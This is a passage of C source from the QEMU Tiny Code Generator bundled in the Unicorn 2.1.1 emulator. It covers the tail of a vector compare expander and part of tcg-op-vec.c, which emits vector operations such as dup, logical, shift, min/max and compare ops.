[TCG_COND_NE] = ne_fn, [TCG_COND_LT] = lt_fn, [TCG_COND_LE] = le_fn, [TCG_COND_LTU] = ltu_fn, [TCG_COND_LEU] = leu_fn, }; const TCGOpcode *hold_list; TCGType type; uint32_t some; check_size_align(oprsz, maxsz, dofs | aofs | bofs); check_overlap_3(dofs, aofs, bofs, maxsz); if (cond == TCG_COND_NEVER || cond == TCG_COND_ALWAYS) { do_dup(tcg_ctx, MO_8, dofs, oprsz, maxsz, NULL, NULL, -(cond == TCG_COND_ALWAYS)); return; } /* * Implement inline with a vector type, if possible. * Prefer integer when 64-bit host and 64-bit comparison. */ hold_list = tcg_swap_vecop_list(cmp_list); type = choose_vector_type(tcg_ctx, cmp_list, vece, oprsz, TCG_TARGET_REG_BITS == 64 && vece == MO_64); switch (type) { case TCG_TYPE_V256: /* Recall that ARM SVE allows vector sizes that are not a * power of 2, but always a multiple of 16. The intent is * that e.g. size == 80 would be expanded with 2x32 + 1x16. 
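* Worked through the code below: QEMU_ALIGN_DOWN(80, 32) == 64, so the * TCG_TYPE_V256 case covers bytes 0..63 in two 32-byte steps inside * expand_cmp_vec, and the remaining 16 bytes fall through to the * TCG_TYPE_V128 case.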
*/ some = QEMU_ALIGN_DOWN(oprsz, 32); expand_cmp_vec(tcg_ctx, vece, dofs, aofs, bofs, some, 32, TCG_TYPE_V256, cond); if (some == oprsz) { break; } dofs += some; aofs += some; bofs += some; oprsz -= some; maxsz -= some; /* fallthru */ case TCG_TYPE_V128: expand_cmp_vec(tcg_ctx, vece, dofs, aofs, bofs, oprsz, 16, TCG_TYPE_V128, cond); break; case TCG_TYPE_V64: expand_cmp_vec(tcg_ctx, vece, dofs, aofs, bofs, oprsz, 8, TCG_TYPE_V64, cond); break; case 0: if (vece == MO_64 && check_size_impl(oprsz, 8)) { expand_cmp_i64(tcg_ctx, dofs, aofs, bofs, oprsz, cond); } else if (vece == MO_32 && check_size_impl(oprsz, 4)) { expand_cmp_i32(tcg_ctx, dofs, aofs, bofs, oprsz, cond); } else { gen_helper_gvec_3 * const *fn = fns[cond]; if (fn == NULL) { uint32_t tmp; tmp = aofs, aofs = bofs, bofs = tmp; cond = tcg_swap_cond(cond); fn = fns[cond]; assert(fn != NULL); } tcg_gen_gvec_3_ool(tcg_ctx, dofs, aofs, bofs, oprsz, maxsz, 0, fn[vece]); oprsz = maxsz; } break; default: g_assert_not_reached(); } tcg_swap_vecop_list(hold_list); if (oprsz < maxsz) { expand_clr(tcg_ctx, dofs + oprsz, maxsz - oprsz); } } static void tcg_gen_bitsel_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b, TCGv_i64 c) { TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_and_i64(tcg_ctx, t, b, a); tcg_gen_andc_i64(tcg_ctx, d, c, a); tcg_gen_or_i64(tcg_ctx, d, d, t); tcg_temp_free_i64(tcg_ctx, t); } void tcg_gen_gvec_bitsel(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t cofs, uint32_t oprsz, uint32_t maxsz) { static const GVecGen4 g = { .fni8 = tcg_gen_bitsel_i64, .fniv = tcg_gen_bitsel_vec, .fno = gen_helper_gvec_bitsel, }; tcg_gen_gvec_4(tcg_ctx, dofs, aofs, bofs, cofs, oprsz, maxsz, &g); }
unicorn-2.1.1/qemu/tcg/tcg-op-vec.c
/* * Tiny Code Generator for QEMU * * Copyright (c) 2018 Linaro, Inc. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>.
*/ #include "qemu/osdep.h" #include "cpu.h" #include "tcg/tcg.h" #include "tcg/tcg-op.h" #include "tcg/tcg-mo.h" /* Reduce the number of ifdefs below. This assumes that all uses of TCGV_HIGH and TCGV_LOW are properly protected by a conditional that the compiler can eliminate. */ #if TCG_TARGET_REG_BITS == 64 extern TCGv_i32 TCGV_LOW_link_error(TCGv_i64); extern TCGv_i32 TCGV_HIGH_link_error(TCGv_i64); #define TCGV_LOW TCGV_LOW_link_error #define TCGV_HIGH TCGV_HIGH_link_error #endif /* * Vector optional opcode tracking. * Except for the basic logical operations (and, or, xor), and * data movement (mov, ld, st, dupi), many vector opcodes are * optional and may not be supported on the host. Thank Intel * for the irregularity in their instruction set. * * The gvec expanders allow custom vector operations to be composed, * generally via the .fniv callback in the GVecGen* structures. At * the same time, in deciding whether to use this hook we need to * know if the host supports the required operations. This is * presented as an array of opcodes, terminated by 0. Each opcode * is assumed to be expanded with the given VECE. * * For debugging, we want to validate this array. Therefore, when * tcg_ctx->vec_opt_opc is non-NULL, the tcg_gen_*_vec expanders * will validate that their opcode is present in the list. */ #ifdef CONFIG_DEBUG_TCG void tcg_assert_listed_vecop(TCGOpcode op) { const TCGOpcode *p = tcg_ctx->vecop_list; if (p) { for (; *p; ++p) { if (*p == op) { return; } } g_assert_not_reached(); } } #endif bool tcg_can_emit_vecop_list(TCGContext *tcg_ctx, const TCGOpcode *list, TCGType type, unsigned vece) { if (list == NULL) { return true; } for (; *list; ++list) { TCGOpcode opc = *list; #ifdef CONFIG_DEBUG_TCG switch (opc) { case INDEX_op_and_vec: case INDEX_op_or_vec: case INDEX_op_xor_vec: case INDEX_op_mov_vec: case INDEX_op_dup_vec: case INDEX_op_dupi_vec: case INDEX_op_dup2_vec: case INDEX_op_ld_vec: case INDEX_op_st_vec: case INDEX_op_bitsel_vec: /* These opcodes are mandatory and should not be listed. */ g_assert_not_reached(); case INDEX_op_not_vec: /* These opcodes have generic expansions using the above. */ g_assert_not_reached(); default: break; } #endif if (tcg_can_emit_vec_op(tcg_ctx, opc, type, vece)) { continue; } /* * The opcode list is created by front ends based on what they * actually invoke. We must mirror the logic in the routines * below for generic expansions using other opcodes. 
*/ switch (opc) { case INDEX_op_neg_vec: if (tcg_can_emit_vec_op(tcg_ctx, INDEX_op_sub_vec, type, vece)) { continue; } break; case INDEX_op_abs_vec: if (tcg_can_emit_vec_op(tcg_ctx, INDEX_op_sub_vec, type, vece) && (tcg_can_emit_vec_op(tcg_ctx, INDEX_op_smax_vec, type, vece) > 0 || tcg_can_emit_vec_op(tcg_ctx, INDEX_op_sari_vec, type, vece) > 0 || tcg_can_emit_vec_op(tcg_ctx, INDEX_op_cmp_vec, type, vece))) { continue; } break; case INDEX_op_cmpsel_vec: case INDEX_op_smin_vec: case INDEX_op_smax_vec: case INDEX_op_umin_vec: case INDEX_op_umax_vec: if (tcg_can_emit_vec_op(tcg_ctx, INDEX_op_cmp_vec, type, vece)) { continue; } break; default: break; } return false; } return true; } void vec_gen_2(TCGContext *tcg_ctx, TCGOpcode opc, TCGType type, unsigned vece, TCGArg r, TCGArg a) { TCGOp *op = tcg_emit_op(tcg_ctx, opc); TCGOP_VECL(op) = type - TCG_TYPE_V64; TCGOP_VECE(op) = vece; op->args[0] = r; op->args[1] = a; } void vec_gen_3(TCGContext *tcg_ctx, TCGOpcode opc, TCGType type, unsigned vece, TCGArg r, TCGArg a, TCGArg b) { TCGOp *op = tcg_emit_op(tcg_ctx, opc); TCGOP_VECL(op) = type - TCG_TYPE_V64; TCGOP_VECE(op) = vece; op->args[0] = r; op->args[1] = a; op->args[2] = b; } void vec_gen_4(TCGContext *tcg_ctx, TCGOpcode opc, TCGType type, unsigned vece, TCGArg r, TCGArg a, TCGArg b, TCGArg c) { TCGOp *op = tcg_emit_op(tcg_ctx, opc); TCGOP_VECL(op) = type - TCG_TYPE_V64; TCGOP_VECE(op) = vece; op->args[0] = r; op->args[1] = a; op->args[2] = b; op->args[3] = c; } static void vec_gen_6(TCGContext *tcg_ctx, TCGOpcode opc, TCGType type, unsigned vece, TCGArg r, TCGArg a, TCGArg b, TCGArg c, TCGArg d, TCGArg e) { TCGOp *op = tcg_emit_op(tcg_ctx, opc); TCGOP_VECL(op) = type - TCG_TYPE_V64; TCGOP_VECE(op) = vece; op->args[0] = r; op->args[1] = a; op->args[2] = b; op->args[3] = c; op->args[4] = d; op->args[5] = e; } static void vec_gen_op2(TCGContext *tcg_ctx, TCGOpcode opc, unsigned vece, TCGv_vec r, TCGv_vec a) { TCGTemp *rt = tcgv_vec_temp(tcg_ctx, r); TCGTemp *at = tcgv_vec_temp(tcg_ctx, a); TCGType type = rt->base_type; /* Must have enough inputs for the output. */ tcg_debug_assert(at->base_type >= type); vec_gen_2(tcg_ctx, opc, type, vece, temp_arg(rt), temp_arg(at)); } static void vec_gen_op3(TCGContext *tcg_ctx, TCGOpcode opc, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { TCGTemp *rt = tcgv_vec_temp(tcg_ctx, r); TCGTemp *at = tcgv_vec_temp(tcg_ctx, a); TCGTemp *bt = tcgv_vec_temp(tcg_ctx, b); TCGType type = rt->base_type; /* Must have enough inputs for the output. */ tcg_debug_assert(at->base_type >= type); tcg_debug_assert(bt->base_type >= type); vec_gen_3(tcg_ctx, opc, type, vece, temp_arg(rt), temp_arg(at), temp_arg(bt)); } void tcg_gen_mov_vec(TCGContext *tcg_ctx, TCGv_vec r, TCGv_vec a) { if (r != a) { vec_gen_op2(tcg_ctx, INDEX_op_mov_vec, 0, r, a); } } #define MO_REG (TCG_TARGET_REG_BITS == 64 ?
MO_64 : MO_32) static void do_dupi_vec(TCGContext *tcg_ctx, TCGv_vec r, unsigned vece, TCGArg a) { TCGTemp *rt = tcgv_vec_temp(tcg_ctx, r); vec_gen_2(tcg_ctx, INDEX_op_dupi_vec, rt->base_type, vece, temp_arg(rt), a); } TCGv_vec tcg_const_zeros_vec(TCGContext *tcg_ctx, TCGType type) { TCGv_vec ret = tcg_temp_new_vec(tcg_ctx, type); do_dupi_vec(tcg_ctx, ret, MO_REG, 0); return ret; } TCGv_vec tcg_const_ones_vec(TCGContext *tcg_ctx, TCGType type) { TCGv_vec ret = tcg_temp_new_vec(tcg_ctx, type); do_dupi_vec(tcg_ctx, ret, MO_REG, -1); return ret; } TCGv_vec tcg_const_zeros_vec_matching(TCGContext *tcg_ctx, TCGv_vec m) { TCGTemp *t = tcgv_vec_temp(tcg_ctx, m); return tcg_const_zeros_vec(tcg_ctx, t->base_type); } TCGv_vec tcg_const_ones_vec_matching(TCGContext *tcg_ctx, TCGv_vec m) { TCGTemp *t = tcgv_vec_temp(tcg_ctx, m); return tcg_const_ones_vec(tcg_ctx, t->base_type); } void tcg_gen_dup64i_vec(TCGContext *tcg_ctx, TCGv_vec r, uint64_t a) { if (TCG_TARGET_REG_BITS == 32 && a == deposit64(a, 32, 32, a)) { do_dupi_vec(tcg_ctx, r, MO_32, a); } else if (TCG_TARGET_REG_BITS == 64 || a == (uint64_t)(int32_t)a) { do_dupi_vec(tcg_ctx, r, MO_64, a); } else { TCGv_i64 c = tcg_const_i64(tcg_ctx, a); tcg_gen_dup_i64_vec(tcg_ctx, MO_64, r, c); tcg_temp_free_i64(tcg_ctx, c); } } void tcg_gen_dup32i_vec(TCGContext *tcg_ctx, TCGv_vec r, uint32_t a) { do_dupi_vec(tcg_ctx, r, MO_REG, dup_const(MO_32, a)); } void tcg_gen_dup16i_vec(TCGContext *tcg_ctx, TCGv_vec r, uint32_t a) { do_dupi_vec(tcg_ctx, r, MO_REG, dup_const(MO_16, a)); } void tcg_gen_dup8i_vec(TCGContext *tcg_ctx, TCGv_vec r, uint32_t a) { do_dupi_vec(tcg_ctx, r, MO_REG, dup_const(MO_8, a)); } void tcg_gen_dupi_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, uint64_t a) { do_dupi_vec(tcg_ctx, r, MO_REG, dup_const(vece, a)); } void tcg_gen_dup_i64_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_i64 a) { TCGArg ri = tcgv_vec_arg(tcg_ctx, r); TCGTemp *rt = arg_temp(ri); TCGType type = rt->base_type; #if TCG_TARGET_REG_BITS == 64 TCGArg ai = tcgv_i64_arg(tcg_ctx, a); vec_gen_2(tcg_ctx, INDEX_op_dup_vec, type, vece, ri, ai); #else if (vece == MO_64) { TCGArg al = tcgv_i32_arg(tcg_ctx, TCGV_LOW(tcg_ctx, a)); TCGArg ah = tcgv_i32_arg(tcg_ctx, TCGV_HIGH(tcg_ctx, a)); vec_gen_3(tcg_ctx, INDEX_op_dup2_vec, type, MO_64, ri, al, ah); } else { TCGArg ai = tcgv_i32_arg(tcg_ctx, TCGV_LOW(tcg_ctx, a)); vec_gen_2(tcg_ctx, INDEX_op_dup_vec, type, vece, ri, ai); } #endif } void tcg_gen_dup_i32_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_i32 a) { TCGArg ri = tcgv_vec_arg(tcg_ctx, r); TCGArg ai = tcgv_i32_arg(tcg_ctx, a); TCGTemp *rt = arg_temp(ri); TCGType type = rt->base_type; vec_gen_2(tcg_ctx, INDEX_op_dup_vec, type, vece, ri, ai); } void tcg_gen_dup_mem_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_ptr b, tcg_target_long ofs) { TCGArg ri = tcgv_vec_arg(tcg_ctx, r); TCGArg bi = tcgv_ptr_arg(tcg_ctx, b); TCGTemp *rt = arg_temp(ri); TCGType type = rt->base_type; vec_gen_3(tcg_ctx, INDEX_op_dupm_vec, type, vece, ri, bi, ofs); } static void vec_gen_ldst(TCGContext *tcg_ctx, TCGOpcode opc, TCGv_vec r, TCGv_ptr b, TCGArg o) { TCGArg ri = tcgv_vec_arg(tcg_ctx, r); TCGArg bi = tcgv_ptr_arg(tcg_ctx, b); TCGTemp *rt = arg_temp(ri); TCGType type = rt->base_type; vec_gen_3(tcg_ctx, opc, type, 0, ri, bi, o); } void tcg_gen_ld_vec(TCGContext *tcg_ctx, TCGv_vec r, TCGv_ptr b, TCGArg o) { vec_gen_ldst(tcg_ctx, INDEX_op_ld_vec, r, b, o); } void tcg_gen_st_vec(TCGContext *tcg_ctx, TCGv_vec r, TCGv_ptr b, TCGArg o) { vec_gen_ldst(tcg_ctx, 
INDEX_op_st_vec, r, b, o); } void tcg_gen_stl_vec(TCGContext *tcg_ctx, TCGv_vec r, TCGv_ptr b, TCGArg o, TCGType low_type) { TCGArg ri = tcgv_vec_arg(tcg_ctx, r); TCGArg bi = tcgv_ptr_arg(tcg_ctx, b); TCGTemp *rt = arg_temp(ri); TCGType type = rt->base_type; tcg_debug_assert(low_type >= TCG_TYPE_V64); tcg_debug_assert(low_type <= type); vec_gen_3(tcg_ctx, INDEX_op_st_vec, low_type, 0, ri, bi, o); } void tcg_gen_and_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { vec_gen_op3(tcg_ctx, INDEX_op_and_vec, 0, r, a, b); } void tcg_gen_or_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { vec_gen_op3(tcg_ctx, INDEX_op_or_vec, 0, r, a, b); } void tcg_gen_xor_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { vec_gen_op3(tcg_ctx, INDEX_op_xor_vec, 0, r, a, b); } void tcg_gen_andc_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { if (TCG_TARGET_HAS_andc_vec) { vec_gen_op3(tcg_ctx, INDEX_op_andc_vec, 0, r, a, b); } else { TCGv_vec t = tcg_temp_new_vec_matching(tcg_ctx, r); tcg_gen_not_vec(tcg_ctx, 0, t, b); tcg_gen_and_vec(tcg_ctx, 0, r, a, t); tcg_temp_free_vec(tcg_ctx, t); } } void tcg_gen_orc_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { if (TCG_TARGET_HAS_orc_vec) { vec_gen_op3(tcg_ctx, INDEX_op_orc_vec, 0, r, a, b); } else { TCGv_vec t = tcg_temp_new_vec_matching(tcg_ctx, r); tcg_gen_not_vec(tcg_ctx, 0, t, b); tcg_gen_or_vec(tcg_ctx, 0, r, a, t); tcg_temp_free_vec(tcg_ctx, t); } } void tcg_gen_nand_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { /* TODO: Add TCG_TARGET_HAS_nand_vec when adding a backend that supports it. */ tcg_gen_and_vec(tcg_ctx, 0, r, a, b); tcg_gen_not_vec(tcg_ctx, 0, r, r); } void tcg_gen_nor_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { /* TODO: Add TCG_TARGET_HAS_nor_vec when adding a backend that supports it. */ tcg_gen_or_vec(tcg_ctx, 0, r, a, b); tcg_gen_not_vec(tcg_ctx, 0, r, r); } void tcg_gen_eqv_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { /* TODO: Add TCG_TARGET_HAS_eqv_vec when adding a backend that supports it.
*/ tcg_gen_xor_vec(tcg_ctx, 0, r, a, b); tcg_gen_not_vec(tcg_ctx, 0, r, r); } static bool do_op2(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGOpcode opc) { TCGTemp *rt = tcgv_vec_temp(tcg_ctx, r); TCGTemp *at = tcgv_vec_temp(tcg_ctx, a); TCGArg ri = temp_arg(rt); TCGArg ai = temp_arg(at); TCGType type = rt->base_type; int can; tcg_debug_assert(at->base_type >= type); tcg_assert_listed_vecop(opc); can = tcg_can_emit_vec_op(tcg_ctx, opc, type, vece); if (can > 0) { vec_gen_2(tcg_ctx, opc, type, vece, ri, ai); } else if (can < 0) { const TCGOpcode *hold_list = tcg_swap_vecop_list(NULL); tcg_expand_vec_op(tcg_ctx, opc, type, vece, ri, ai); tcg_swap_vecop_list(hold_list); } else { return false; } return true; } void tcg_gen_not_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a) { const TCGOpcode *hold_list = tcg_swap_vecop_list(NULL); if (!TCG_TARGET_HAS_not_vec || !do_op2(tcg_ctx, vece, r, a, INDEX_op_not_vec)) { TCGv_vec t = tcg_const_ones_vec_matching(tcg_ctx, r); tcg_gen_xor_vec(tcg_ctx, 0, r, a, t); tcg_temp_free_vec(tcg_ctx, t); } tcg_swap_vecop_list(hold_list); } void tcg_gen_neg_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a) { const TCGOpcode *hold_list; tcg_assert_listed_vecop(INDEX_op_neg_vec); hold_list = tcg_swap_vecop_list(NULL); if (!TCG_TARGET_HAS_neg_vec || !do_op2(tcg_ctx, vece, r, a, INDEX_op_neg_vec)) { TCGv_vec t = tcg_const_zeros_vec_matching(tcg_ctx, r); tcg_gen_sub_vec(tcg_ctx, vece, r, t, a); tcg_temp_free_vec(tcg_ctx, t); } tcg_swap_vecop_list(hold_list); } void tcg_gen_abs_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a) { const TCGOpcode *hold_list; tcg_assert_listed_vecop(INDEX_op_abs_vec); hold_list = tcg_swap_vecop_list(NULL); if (!do_op2(tcg_ctx, vece, r, a, INDEX_op_abs_vec)) { TCGType type = tcgv_vec_temp(tcg_ctx, r)->base_type; TCGv_vec t = tcg_temp_new_vec(tcg_ctx, type); tcg_debug_assert(tcg_can_emit_vec_op(tcg_ctx, INDEX_op_sub_vec, type, vece)); if (tcg_can_emit_vec_op(tcg_ctx, INDEX_op_smax_vec, type, vece) > 0) { tcg_gen_neg_vec(tcg_ctx, vece, t, a); tcg_gen_smax_vec(tcg_ctx, vece, r, a, t); } else { if (tcg_can_emit_vec_op(tcg_ctx, INDEX_op_sari_vec, type, vece) > 0) { tcg_gen_sari_vec(tcg_ctx, vece, t, a, (8 << vece) - 1); } else { do_dupi_vec(tcg_ctx, t, MO_REG, 0); tcg_gen_cmp_vec(tcg_ctx, TCG_COND_LT, vece, t, a, t); } tcg_gen_xor_vec(tcg_ctx, vece, r, a, t); tcg_gen_sub_vec(tcg_ctx, vece, r, r, t); } tcg_temp_free_vec(tcg_ctx, t); } tcg_swap_vecop_list(hold_list); } static void do_shifti(TCGContext *tcg_ctx, TCGOpcode opc, unsigned vece, TCGv_vec r, TCGv_vec a, int64_t i) { TCGTemp *rt = tcgv_vec_temp(tcg_ctx, r); TCGTemp *at = tcgv_vec_temp(tcg_ctx, a); TCGArg ri = temp_arg(rt); TCGArg ai = temp_arg(at); TCGType type = rt->base_type; int can; tcg_debug_assert(at->base_type == type); tcg_debug_assert(i >= 0 && i < (8 << vece)); tcg_assert_listed_vecop(opc); if (i == 0) { tcg_gen_mov_vec(tcg_ctx, r, a); return; } can = tcg_can_emit_vec_op(tcg_ctx, opc, type, vece); if (can > 0) { vec_gen_3(tcg_ctx, opc, type, vece, ri, ai, i); } else { /* We leave the choice of expansion via scalar or vector shift to the target. Often, but not always, dupi can feed a vector shift easier than a scalar. 
*/ const TCGOpcode *hold_list = tcg_swap_vecop_list(NULL); tcg_debug_assert(can < 0); tcg_expand_vec_op(tcg_ctx, opc, type, vece, ri, ai, i); tcg_swap_vecop_list(hold_list); } } void tcg_gen_shli_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, int64_t i) { do_shifti(tcg_ctx, INDEX_op_shli_vec, vece, r, a, i); } void tcg_gen_shri_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, int64_t i) { do_shifti(tcg_ctx, INDEX_op_shri_vec, vece, r, a, i); } void tcg_gen_sari_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, int64_t i) { do_shifti(tcg_ctx, INDEX_op_sari_vec, vece, r, a, i); } void tcg_gen_cmp_vec(TCGContext *tcg_ctx, TCGCond cond, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { TCGTemp *rt = tcgv_vec_temp(tcg_ctx, r); TCGTemp *at = tcgv_vec_temp(tcg_ctx, a); TCGTemp *bt = tcgv_vec_temp(tcg_ctx, b); TCGArg ri = temp_arg(rt); TCGArg ai = temp_arg(at); TCGArg bi = temp_arg(bt); TCGType type = rt->base_type; int can; tcg_debug_assert(at->base_type >= type); tcg_debug_assert(bt->base_type >= type); tcg_assert_listed_vecop(INDEX_op_cmp_vec); can = tcg_can_emit_vec_op(tcg_ctx, INDEX_op_cmp_vec, type, vece); if (can > 0) { vec_gen_4(tcg_ctx, INDEX_op_cmp_vec, type, vece, ri, ai, bi, cond); } else { const TCGOpcode *hold_list = tcg_swap_vecop_list(NULL); tcg_debug_assert(can < 0); tcg_expand_vec_op(tcg_ctx, INDEX_op_cmp_vec, type, vece, ri, ai, bi, cond); tcg_swap_vecop_list(hold_list); } } static bool do_op3(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b, TCGOpcode opc) { TCGTemp *rt = tcgv_vec_temp(tcg_ctx, r); TCGTemp *at = tcgv_vec_temp(tcg_ctx, a); TCGTemp *bt = tcgv_vec_temp(tcg_ctx, b); TCGArg ri = temp_arg(rt); TCGArg ai = temp_arg(at); TCGArg bi = temp_arg(bt); TCGType type = rt->base_type; int can; tcg_debug_assert(at->base_type >= type); tcg_debug_assert(bt->base_type >= type); tcg_assert_listed_vecop(opc); can = tcg_can_emit_vec_op(tcg_ctx, opc, type, vece); if (can > 0) { vec_gen_3(tcg_ctx, opc, type, vece, ri, ai, bi); } else if (can < 0) { const TCGOpcode *hold_list = tcg_swap_vecop_list(NULL); tcg_expand_vec_op(tcg_ctx, opc, type, vece, ri, ai, bi); tcg_swap_vecop_list(hold_list); } else { return false; } return true; } static void do_op3_nofail(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b, TCGOpcode opc) { bool ok = do_op3(tcg_ctx, vece, r, a, b, opc); tcg_debug_assert(ok); } void tcg_gen_add_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { do_op3_nofail(tcg_ctx, vece, r, a, b, INDEX_op_add_vec); } void tcg_gen_sub_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { do_op3_nofail(tcg_ctx, vece, r, a, b, INDEX_op_sub_vec); } void tcg_gen_mul_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { do_op3_nofail(tcg_ctx, vece, r, a, b, INDEX_op_mul_vec); } void tcg_gen_ssadd_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { do_op3_nofail(tcg_ctx, vece, r, a, b, INDEX_op_ssadd_vec); } void tcg_gen_usadd_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { do_op3_nofail(tcg_ctx, vece, r, a, b, INDEX_op_usadd_vec); } void tcg_gen_sssub_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { do_op3_nofail(tcg_ctx, vece, r, a, b, INDEX_op_sssub_vec); } void tcg_gen_ussub_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { do_op3_nofail(tcg_ctx, vece, r, a, b, INDEX_op_ussub_vec); } static void do_minmax(TCGContext 
*tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b, TCGOpcode opc, TCGCond cond) { if (!do_op3(tcg_ctx, vece, r, a, b, opc)) { tcg_gen_cmpsel_vec(tcg_ctx, cond, vece, r, a, b, a, b); } } void tcg_gen_smin_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { do_minmax(tcg_ctx, vece, r, a, b, INDEX_op_smin_vec, TCG_COND_LT); } void tcg_gen_umin_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { do_minmax(tcg_ctx, vece, r, a, b, INDEX_op_umin_vec, TCG_COND_LTU); } void tcg_gen_smax_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { do_minmax(tcg_ctx, vece, r, a, b, INDEX_op_smax_vec, TCG_COND_GT); } void tcg_gen_umax_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { do_minmax(tcg_ctx, vece, r, a, b, INDEX_op_umax_vec, TCG_COND_GTU); } void tcg_gen_shlv_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { do_op3_nofail(tcg_ctx, vece, r, a, b, INDEX_op_shlv_vec); } void tcg_gen_shrv_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { do_op3_nofail(tcg_ctx, vece, r, a, b, INDEX_op_shrv_vec); } void tcg_gen_sarv_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b) { do_op3_nofail(tcg_ctx, vece, r, a, b, INDEX_op_sarv_vec); } static void do_shifts(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_i32 s, TCGOpcode opc_s, TCGOpcode opc_v) { TCGTemp *rt = tcgv_vec_temp(tcg_ctx, r); TCGTemp *at = tcgv_vec_temp(tcg_ctx, a); TCGTemp *st = tcgv_i32_temp(tcg_ctx, s); TCGArg ri = temp_arg(rt); TCGArg ai = temp_arg(at); TCGArg si = temp_arg(st); TCGType type = rt->base_type; const TCGOpcode *hold_list; int can; tcg_debug_assert(at->base_type >= type); tcg_assert_listed_vecop(opc_s); hold_list = tcg_swap_vecop_list(NULL); can = tcg_can_emit_vec_op(tcg_ctx, opc_s, type, vece); if (can > 0) { vec_gen_3(tcg_ctx, opc_s, type, vece, ri, ai, si); } else if (can < 0) { tcg_expand_vec_op(tcg_ctx, opc_s, type, vece, ri, ai, si); } else { TCGv_vec vec_s = tcg_temp_new_vec(tcg_ctx, type); if (vece == MO_64) { TCGv_i64 s64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, s64, s); tcg_gen_dup_i64_vec(tcg_ctx, MO_64, vec_s, s64); tcg_temp_free_i64(tcg_ctx, s64); } else { tcg_gen_dup_i32_vec(tcg_ctx, vece, vec_s, s); } do_op3_nofail(tcg_ctx, vece, r, a, vec_s, opc_v); tcg_temp_free_vec(tcg_ctx, vec_s); } tcg_swap_vecop_list(hold_list); } void tcg_gen_shls_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_i32 b) { do_shifts(tcg_ctx, vece, r, a, b, INDEX_op_shls_vec, INDEX_op_shlv_vec); } void tcg_gen_shrs_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_i32 b) { do_shifts(tcg_ctx, vece, r, a, b, INDEX_op_shrs_vec, INDEX_op_shrv_vec); } void tcg_gen_sars_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_i32 b) { do_shifts(tcg_ctx, vece, r, a, b, INDEX_op_sars_vec, INDEX_op_sarv_vec); } void tcg_gen_bitsel_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b, TCGv_vec c) { TCGTemp *rt = 